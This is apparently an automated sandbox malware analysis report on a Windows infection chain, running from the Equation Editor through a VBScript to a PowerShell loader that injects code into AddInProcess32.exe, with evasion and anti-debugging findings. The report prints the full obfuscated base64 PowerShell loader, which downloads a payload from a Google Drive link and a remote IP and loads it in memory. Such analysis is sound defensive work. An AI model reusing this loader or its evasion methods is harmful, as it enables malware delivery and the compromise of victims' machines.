                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: powershell.exe, 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 970000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598502Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2454Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1167Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8724Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3720Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep count: 1167 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep count: 8724 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -598502s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -1800000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3212Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598502Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: AddInProcess32.exe, 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: AddInProcess32.exe, 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_001D5310 CheckRemoteDebuggerPresent,9_2_001D5310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035604D9 mov edx, dword ptr fs:[00000030h]2_2_035604D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = 